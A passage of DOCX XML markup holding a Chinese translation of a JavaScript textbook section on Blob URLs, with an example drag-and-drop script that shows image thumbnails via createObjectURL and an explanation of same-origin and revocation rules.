        <w:t xml:space="preserve">Blob </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>只是对浏览器存储在内存中或者磁盘上的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的一个简单引用。</w:t>
      </w:r>
      <w:r>
        <w:t>blob://URL</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>file://URL</w:t>
      </w:r>
      <w:r>
        <w:t>也是不同的，</w:t>
      </w:r>
      <w:r>
        <w:t>file://URL</w:t>
      </w:r>
      <w:r>
        <w:t>直接指向本地文件系统中的一个文件，仅暴露了文件的路径、浏览目录的许可等，除此之外任何内容都会带来安全问题的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-10</w:t>
      </w:r>
      <w:r>
        <w:t>展示了两种重要的技术。首先，它实现了一个和文件相关的用于监听拖放事件的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>拖放目标区域</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。然后，当用户将一个或多个文件拖放到该目标区域中时，它会使用</w:t>
      </w:r>
      <w:r>
        <w:t>createObjectURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来为每个文件获取一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，然后创建＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来展示</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>引用</w:t>
      </w:r>
      <w:r>
        <w:t>图片的缩略图。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-10</w:t>
      </w:r>
      <w:r>
        <w:t>：用</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>来显示一个拖放的图片文件</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r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>截至撰写本书时，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Webkit</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//createObjectURL()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的命名上意见不统一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var getBlobURL=(window.URL</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>URL.createObjectURL.bind(URL))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(window.webkitURL</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>webkitURL.createObjectURL.bind(webkitURL))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.createObjectURL;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var revokeBlobURL=(window.URL</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>URL.revokeObjectURL.bind(URL))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(window.webkitURL</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>webkitURL.revokeObjectURL.bind(webkitURL))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.revokeObjectURL;//</w:t>
      </w:r>
      <w:r>
        <w:t>在文档载入后，在</w:t>
      </w:r>
      <w:r>
        <w:t>droptarget</w:t>
      </w:r>
      <w:r>
        <w:t>元素上添加事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以便它可以处理文件的拖放</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onload=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>查询要向其中</w:t>
      </w:r>
      <w:r>
        <w:t>添加处理程序的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var droptarget=document.getElementById("droptarget");//</w:t>
      </w:r>
      <w:r>
        <w:t>当用户开始拖放文件经过</w:t>
      </w:r>
      <w:r>
        <w:t>droptarget</w:t>
      </w:r>
      <w:r>
        <w:t>元素的时候，将其高亮显示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>droptarget.ondragenter=function(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果拖的不是文件，则忽略它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在实现的时候，使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>dropzone</w:t>
      </w:r>
      <w:r>
        <w:t>属性会更加简单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var types=e.dataTransfer.types;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!types||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(types.contains</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>types.contai</w:t>
      </w:r>
      <w:r>
        <w:t>ns("Files"))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(types.indexOf</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>types.indexOf("Files")!=-1)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>droptarget.classList.add("active");//</w:t>
      </w:r>
      <w:r>
        <w:t>高亮显示</w:t>
      </w:r>
      <w:r>
        <w:t>droptarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>阻止默认事件处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>如果用户移出该区域，则取消高亮显示拖放区域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>droptarget.ondragleave=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>droptarget.classList.remove("active");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>此处理程序只是通知浏览器继续发送提醒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>droptarget.ondragover=function(e){return false;};//</w:t>
      </w:r>
      <w:r>
        <w:t>当用户放下文件时，就获取它们的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，并显示对应的缩略图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>droptarget.ondrop=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var files=e.dataTransfer.files;//</w:t>
      </w:r>
      <w:r>
        <w:t>放下的文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>files.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环每个文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var type=files[i].type;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(type.substring(</w:t>
      </w:r>
      <w:r>
        <w:t>0,6)!=="image/")//</w:t>
      </w:r>
      <w:r>
        <w:t>不是图片则忽略</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>continue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var img=document.createElement("img");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>img.src=getBlobURL(files[i]);//</w:t>
      </w:r>
      <w:r>
        <w:t>在＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上使用</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>img.onload=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>图片载入的时候</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.width=100;//</w:t>
      </w:r>
      <w:r>
        <w:t>调整图片大小并</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.appendChild(this);//</w:t>
      </w:r>
      <w:r>
        <w:t>将它添加到文档中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>revokeBlobURL(this.</w:t>
      </w:r>
      <w:r>
        <w:t>src);//</w:t>
      </w:r>
      <w:r>
        <w:t>但是要避免内存泄漏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>droptarget.classList.remove("active");//</w:t>
      </w:r>
      <w:r>
        <w:t>取消高亮显示</w:t>
      </w:r>
      <w:r>
        <w:t>droptarget</w:t>
      </w:r>
      <w:r>
        <w:t>区域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>处理完毕</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style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>给文件拖放目标区域定义简单的样式</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#droptarget{border:solid black 2px;width:200px;height:200px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#droptarget.active{border:solid red 4px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>文档只定义文件拖放目标区域</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div id="droptarget"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Drop Image Files Here</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</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Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>和创建它们的脚本拥有同样的源（参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）。这使得它们比</w:t>
      </w:r>
      <w:r>
        <w:t>file://URL</w:t>
      </w:r>
      <w:r>
        <w:t>更加灵活，由于</w:t>
      </w:r>
      <w:r>
        <w:t>file://URL</w:t>
      </w:r>
      <w:r>
        <w:t>是非同源的，因此要在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用中使用它们相对比较麻烦。</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>只有在同源的文档中才是有效的。比如，如果将一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Blob </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>postMessag</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>e()</w:t>
      </w:r>
      <w:r>
        <w:t>传递给一个非同源窗口，则该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>对于该窗口来说是没有任何意义的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>并不是永久有效的。一旦用户关闭了或者离开了包含创建</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>脚本的文档，该</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>就失效了。比如，将</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>保存到本地存储器中，然后当用户开始一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用会话的时再使用它，这是不可能的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>URL.revokeObjectURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（或者</w:t>
      </w:r>
      <w:r>
        <w:t>webkitURL.revokeObjectURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法），来手动让</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>失效，这在例</w:t>
      </w:r>
      <w:r>
        <w:t>22-10</w:t>
      </w:r>
      <w:r>
        <w:t>中已经</w:t>
      </w:r>
      <w:r>
        <w:t>使用到了。之所以提供这样的方式，是因为这和内存管理问题有关。一旦展示了图片的缩略图之后，</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>就不再需要了，应当回收它。但是，如果</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器正维护创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>之间的映射关系，那么即使该</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>已经不用了，也不会被回收。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器无法跟踪字符串的使用情况，如果</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>仍然是有效的，那么它只能认为该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>可能还在用。这就意味着，在手动撤销该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>之前，是不会将其回收的。例</w:t>
      </w:r>
      <w:r>
        <w:t>22-10</w:t>
      </w:r>
      <w:r>
        <w:t>使用的是都是本地文件，不需要对其进行清除，但是，不难想象，如果通过</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>都是存储在内存中，或者通过</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>下载的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>是存储在一个临时文件中的话，那么一定会有严重的内存管理问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>blob://URL</w:t>
      </w:r>
      <w:r>
        <w:t>模式被显式地设计成像一个简化的</w:t>
      </w:r>
      <w:r>
        <w:t>http://URL</w:t>
      </w:r>
      <w:r>
        <w:t>那样工作，并且，当请求一个</w:t>
      </w:r>
      <w:r>
        <w:t>blob://URL</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，要求浏览器像迷你的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器那样做出响应。如果请求的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>已经失效，浏览器必须返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:t>无法找到的状态码。如果请求的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>来自另外的源，那么浏览器必须返回</w:t>
      </w:r>
      <w:r>
        <w:t>403</w:t>
      </w:r>
      <w:r>
        <w:t>禁止访问的状态码。</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>只允许通过</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求获取，并</w:t>
      </w:r>
      <w:r>
        <w:t>且一旦获取成功，浏览器必须返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP 200 OK</w:t>
      </w:r>
      <w:r>
        <w:t>的状态码，同时返回一个使用</w:t>
      </w:r>
      <w:r>
        <w:t>Blob type</w:t>
      </w:r>
      <w:r>
        <w:t>属性的</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>头部信息。由于</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>的工作方式和简单的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP URL</w:t>
      </w:r>
      <w:r>
        <w:t>一致，因此可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>将它们指定的内容</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>下载</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>下来。（然而，下一节会介绍如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象更直接地读取</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的内容。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="562" w:name="22_6_5_Du_Qu_Blob"/>
      <w:r>
        <w:t>22.6.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　读取</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:bookmarkEnd w:id="562"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>到目前为止，介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>是不透明的大数据块，只允许通过</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>来间接地访问它们的内容。</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象允许访问</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>lob</w:t>
      </w:r>
      <w:r>
        <w:t>中的字符或者字节，可以将它视为是</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>对应的一个对象。（其实这个名字叫</w:t>
      </w:r>
      <w:r>
        <w:t>BlobReader</w:t>
      </w:r>
      <w:r>
        <w:t>会更好，因为它只适用于</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>而不是文件。）由于</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>可能会是存储在文件系统中的大对象，因此读取它们的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是异步的，和</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest API</w:t>
      </w:r>
      <w:r>
        <w:t>很像。尽管</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>程也可以使用异步的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，但在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中有对应的同步版本的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，叫</w:t>
      </w:r>
